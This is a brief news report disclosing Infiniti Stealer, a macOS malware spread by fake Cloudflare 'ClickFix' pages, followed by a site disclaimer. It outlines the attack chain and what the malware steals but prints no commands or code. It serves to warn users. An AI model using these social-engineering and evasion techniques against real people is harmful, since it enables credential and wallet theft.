Gate News message, on March 30, GoPlus Security disclosed that a spyware malware named Infiniti Stealer is stealing from Mac users’ encrypted wallets and sensitive credentials through a “ClickFix” social engineering attack. The attackers forge a highly realistic Cloudflare verification code page to trick users into opening the terminal and manually pasting to execute malicious commands. After the commands are executed, the script will remove macOS quarantine attributes and silently run subsequent payloads by writing them into the /tmp directory. The final payload is a native macOS binary compiled with Nuitka, significantly increasing the difficulty for security tools to detect it. Once deployed, Infiniti Stealer can steal credentials from Chromium/Firefox browsers, macOS Keychain, encrypted wallets, and developer key files (such as .env files), and it also has sandbox detection and delayed execution capabilities to evade tracking.
Disclaimer: The information on this page may come from third parties and does not represent the views or opinions of Gate. The content displayed on this page is for reference only and does not constitute any financial, investment, or legal advice. Gate does not guarantee the accuracy or completeness of the information and shall not be liable for any losses arising from the use of this information. Virtual asset investments carry high risks and are subject to significant price volatility. You may lose all of your invested principal. Please fully understand the relevant risks and make prudent decisions based on your own financial situation and risk tolerance. For details, please refer to
Disclaimer.
